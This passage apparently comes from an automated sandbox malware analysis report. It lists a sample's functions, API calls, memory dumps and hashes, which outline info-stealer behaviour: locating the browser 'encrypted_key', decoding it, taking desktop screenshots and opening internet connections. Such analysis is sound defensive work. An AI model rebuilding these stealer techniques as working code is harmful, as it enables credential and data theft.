                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcessstrtok_s
                                                                                                                                                                        • String ID: block
                                                                                                                                                                        • API String ID: 3407564107-2199623458
                                                                                                                                                                        • Opcode ID: 2936ceae808e30828c9c1a868894474149af25ecca641710117ca0de30ec9587
                                                                                                                                                                        • Instruction ID: deb0ccb2ceb4547041c701e0fcbff1e679b8da44d69bdfc17a955957cc4459d9
                                                                                                                                                                        • Opcode Fuzzy Hash: 2936ceae808e30828c9c1a868894474149af25ecca641710117ca0de30ec9587
                                                                                                                                                                        • Instruction Fuzzy Hash: B0416BB0A40306FBDF416F74EC89EAA7BACFB24B5AB104026F413D6092E734D650AB55
                                                                                                                                                                        Function 0019584D Relevance: 18.2, APIs: 12, Instructions: 189stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00195885
                                                                                                                                                                        • _memset.LIBCMT ref: 00195896
                                                                                                                                                                          • Part of subcall function 00191D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00191DD2
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 001958C1
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 001958DF
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?), ref: 001958F3
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?), ref: 00195906
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00191D67: GetFileAttributesA.KERNEL32(?,?,?,0018DA54,?,?,?), ref: 00191D6E
                                                                                                                                                                          • Part of subcall function 0018819F: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0018CC65,?,?), ref: 001881E5
                                                                                                                                                                          • Part of subcall function 00187FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0018E72B,?,?,?), ref: 00187FC7
                                                                                                                                                                          • Part of subcall function 00187FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FDE
                                                                                                                                                                          • Part of subcall function 00187FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0018E72B,?,?,?), ref: 00187FF5
                                                                                                                                                                          • Part of subcall function 00187FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0018E72B,?,?,?), ref: 0018800C
                                                                                                                                                                          • Part of subcall function 00187FAC: CloseHandle.KERNEL32(?,?,?,?,?,0018E72B,?,?,?), ref: 00188034
                                                                                                                                                                          • Part of subcall function 001921BC: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,0019599C,?), ref: 001921C7
                                                                                                                                                                        • StrStrA.SHLWAPI(00000000), ref: 001959AA
                                                                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00195ACE
                                                                                                                                                                          • Part of subcall function 00188048: CryptStringToBinaryA.CRYPT32(00186724,00000000,00000001,00000000,?,00000000,00000000), ref: 00188060
                                                                                                                                                                          • Part of subcall function 00188048: LocalAlloc.KERNEL32(00000040,?,?,?,00186724,?), ref: 0018806E
                                                                                                                                                                          • Part of subcall function 00188048: CryptStringToBinaryA.CRYPT32(00186724,00000000,00000001,00000000,?,00000000,00000000), ref: 00188084
                                                                                                                                                                          • Part of subcall function 00188048: LocalFree.KERNEL32(?,?,?,00186724,?), ref: 00188093
                                                                                                                                                                        • lstrcatA.KERNEL32(?,00000000), ref: 00195A5A
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B6645), ref: 00195A77
                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00195A96
                                                                                                                                                                        • lstrcatA.KERNEL32(?,001B6A94), ref: 00195AA7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4109952398-0
                                                                                                                                                                        • Opcode ID: a73e5116ffaf301163343ff59a1515bef51ff6a3a05b0e5c5665d2bf3729e17f
                                                                                                                                                                        • Instruction ID: 280f18b78a883614d2d03ff19e11c6113b757b5af028c487e8b631b692c0e2a4
                                                                                                                                                                        • Opcode Fuzzy Hash: a73e5116ffaf301163343ff59a1515bef51ff6a3a05b0e5c5665d2bf3729e17f
                                                                                                                                                                        • Instruction Fuzzy Hash: 76715EB5C4012C9FDF21EF24DC85BD977BAAB98310F0405E6E508A3250EB329BA58F51
                                                                                                                                                                        Function 00191F2A Relevance: 18.1, APIs: 12, Instructions: 147COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00191F6B
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00191F79
                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00191F86
                                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00191FB3
                                                                                                                                                                        • GetHGlobalFromStream.COMBASE(?,?), ref: 0019201E
                                                                                                                                                                        • GlobalLock.KERNEL32(?), ref: 00192027
                                                                                                                                                                        • GlobalSize.KERNEL32(?), ref: 00192033
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00185482: lstrlenA.KERNEL32(?), ref: 00185519
                                                                                                                                                                          • Part of subcall function 00185482: StrCmpCA.SHLWAPI(?,001B6976,001B695B,001B6957,001B694B), ref: 00185588
                                                                                                                                                                          • Part of subcall function 00185482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 001855AA
                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00192091
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 001920AC
                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 001920B5
                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 001920BD
                                                                                                                                                                        • CloseWindow.USER32(00000000), ref: 001920C4
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: GlobalObject$Window$DeleteSelectStreamlstrcpy$CloseCreateDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1802806997-0
                                                                                                                                                                        • Opcode ID: d39e8049ba49bd79cb0725f927157ca300bc71758a151bfb6deca8333548c529
                                                                                                                                                                        • Instruction ID: 16b6a9e270406d7eb5391b6d91f2b97583bf0fdc525982f0d52a2164fecd8f53
                                                                                                                                                                        • Opcode Fuzzy Hash: d39e8049ba49bd79cb0725f927157ca300bc71758a151bfb6deca8333548c529
                                                                                                                                                                        • Instruction Fuzzy Hash: C851C176801118AFDF12BFA5ED499AEBF7DFF08311F044426F901E6120DB309A55DBA1
                                                                                                                                                                        Function 001A8B64 Relevance: 18.1, APIs: 12, Instructions: 95COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3833677464-0
                                                                                                                                                                        • Opcode ID: 0bfd5681c6dfdf8b1efa893f65c53523ad19a6f35d026be3c84c101a930647ac
                                                                                                                                                                        • Instruction ID: 6f4ce30bc2d34ef7adbda06b17400535aba745b70af9cd036151d4ac42f0a1f0
                                                                                                                                                                        • Opcode Fuzzy Hash: 0bfd5681c6dfdf8b1efa893f65c53523ad19a6f35d026be3c84c101a930647ac
                                                                                                                                                                        • Instruction Fuzzy Hash: B521083D504600EFDB39BF29E803D5ABBE4EFA3B64B24442DF58596152EF319C009A65
                                                                                                                                                                        Function 001815E6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001815BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 001815C6
                                                                                                                                                                          • Part of subcall function 001815BC: HeapAlloc.KERNEL32(00000000), ref: 001815CD
                                                                                                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 00181606
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0018160C
                                                                                                                                                                        • SetCriticalSectionSpinCount.KERNEL32(00000000,00000000), ref: 00181614
                                                                                                                                                                        • GetWindowContextHelpId.USER32(00000000), ref: 0018161B
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,00000000), ref: 00181623
                                                                                                                                                                        • RegisterClassW.USER32(00000000), ref: 0018162A
                                                                                                                                                                        • IsWindowVisible.USER32(00000000), ref: 00181631
                                                                                                                                                                        • ConvertDefaultLocale.KERNEL32(00000000), ref: 00181638
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00181644
                                                                                                                                                                        • IsDialogMessageW.USER32(00000000,00000000), ref: 0018164C
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00181656
                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0018165D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3627164727-0
                                                                                                                                                                        • Opcode ID: d47fad2b53ca7759b3b2daa58738b8be2f1797321f3616565b8c451922f83172
                                                                                                                                                                        • Instruction ID: 987632c6cd1b7bc31d6b28348834b15f1d1764396a2ceba27aa91aff4621c207
                                                                                                                                                                        • Opcode Fuzzy Hash: d47fad2b53ca7759b3b2daa58738b8be2f1797321f3616565b8c451922f83172
                                                                                                                                                                        • Instruction Fuzzy Hash: C2014272402824BB87177BA1ED4DDDF3F6CEF4E3927140245F60A914208B798686CBFA
                                                                                                                                                                        Function 0019B9D6 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0019BA0A
                                                                                                                                                                        • GetFileSize.KERNEL32(?,00000000), ref: 0019BA83
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0019BA9F
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0019BAB3
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0019BABC
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0019BACC
                                                                                                                                                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0019BAEA
                                                                                                                                                                        • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0019BAFA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$PointerRead$HandleInformationSize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2979504256-3916222277
                                                                                                                                                                        • Opcode ID: a97f90e6c042f64ea212252e86e9629f0a9e1b7af1e4eb145b214c01c5a19598
                                                                                                                                                                        • Instruction ID: cf391fee9442a4c2b7dc956c623a21f2858d27dc12bbcbeeb28a9068d8336481
                                                                                                                                                                        • Opcode Fuzzy Hash: a97f90e6c042f64ea212252e86e9629f0a9e1b7af1e4eb145b214c01c5a19598
                                                                                                                                                                        • Instruction Fuzzy Hash: 2851F2B1D04218AFDF29DFA9E9C1AAEBBB9FB48304F10442AE512E7260D7749D45CF50
                                                                                                                                                                        Function 00181AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _memset.LIBCMT ref: 00181ADC
                                                                                                                                                                          • Part of subcall function 00181A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00181A65
                                                                                                                                                                          • Part of subcall function 00181A51: HeapAlloc.KERNEL32(00000000), ref: 00181A6C
